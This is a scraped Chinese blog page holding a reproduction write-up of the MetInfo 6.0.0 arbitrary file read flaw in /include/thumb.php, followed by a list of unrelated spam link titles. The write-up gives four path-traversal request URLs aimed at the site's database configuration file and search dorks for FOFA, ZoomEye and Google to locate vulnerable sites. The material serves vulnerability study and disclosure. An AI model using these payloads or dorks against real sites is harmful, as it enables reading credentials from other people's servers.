当前位置: 首页 > news >正文

dede做英文网站优化网络营销网课

dede做英文网站优化,网络营销网课,动态网站开发考证,嘉兴网站建设方案策划metinfo __ 6.0.0 __ file-read 说明内容漏洞编号–漏洞名称MetInfo 6.0.0 任意文件读取漏洞漏洞评级高危影响范围6.0.0.0漏洞描述MetInfo 存在任意文件读取漏洞,攻击者利用该漏洞,在具有权限的情况下,可以读取网站任意文件,包括…

metinfo __ 6.0.0 __ file-read

说明内容
漏洞编号
漏洞名称MetInfo 6.0.0 任意文件读取漏洞
漏洞评级高危
影响范围6.0.0.0
漏洞描述MetInfo 存在任意文件读取漏洞,攻击者利用该漏洞,
在具有权限的情况下,可以读取网站任意文件,包括配置文件等敏感文件。
修复方案打补丁
升级
上设备

1.漏洞描述

MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。

2.漏洞等级

高危

3.影响版本

Metinfo 6.0.0

4.漏洞复现

4.1基础环境

在这里插入图片描述

4.2 漏洞实现

4.2.1注入点

/include/thumb.php

在这里插入图片描述

在这里插入图片描述

4.2.2第一次测试

/include/thumb.php?dir=..././http/..././config/config_db.php

在这里插入图片描述

4.2.3第二次测试

/include/thumb.php?dir=.....///http/.....///config/config_db.php

在这里插入图片描述

4.2.4第三次测试

/include/thumb.php?dir=http/.....///.....///config/config_db.php

在这里插入图片描述

4.2.5第四次测试

/include/thumb.php?dir=http\..\..\config\config_db.php

在这里插入图片描述

4.3 漏洞分析

5. 漏洞挖掘

5.1指纹信息

传统搜索引擎

Powered by MetInfo 6.0.0
intext:"Powered by MetInfo 6.0.0" inurl:"tw"

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

6. 漏洞修复

  • 打补丁
  • 升级
  • 上设备
http://www.zhongyajixie.com/news/38469.html

相关文章:

  • 做会计网站的流程图关键词排名顾问
  • c2c网站网址跨境网站建站
  • 网站建设时间表seo实战培训学校
  • 企业怎么建设网站首页上海推广网站
  • 某班级网站建设方案中央刚刚宣布大消息
  • 手机网站推荐导航页广州seo技术优化网站seo
  • 岗顶网站建设推广发布任务平台app下载
  • 网站怎么申请百度小程序sem是什么分析方法
  • 男女生做羞羞网站网络推广的目标
  • div css制作个人网站厦门人才网最新招聘信息
  • 山东省城建设计院网站新乡网站优化公司
  • 宁阳移动网站制作微信营销平台系统
  • 内蒙古城乡和建设厅网站seo优化方法有哪些
  • 黑客网站网址入口搜索引擎优化方法有哪几种
  • 珠海网站建设zhkmkj2022重大时政热点事件简短
  • 光纤做网站 移动不能访问电信天津seo排名收费
  • 哪有做外单的图片素材网站企业培训考试
  • 群辉怎么做视频网站徐州seo培训
  • 香港国际建设网站首页热点时事新闻
  • 网站建设需要哪些费用曲靖seo建站
  • wordpress最新模板seo与sem的区别与联系
  • 网站建设了流程百度指数疫情
  • 自己做的网站在浏览器上显示不安全吗电商网址
  • 宣传推广方案怎么写模板seo主要做什么
  • 智能广告投放平台东莞seo报价
  • 哪个网站可以做批发关键词优化策略
  • 没有网站如何做cpa百度权重是怎么来的
  • wordpress 菜单首页百度推广优化工具
  • 淘宝店铺 发布网站建设自动的网站设计制作
  • 外贸快车官网seo流量工具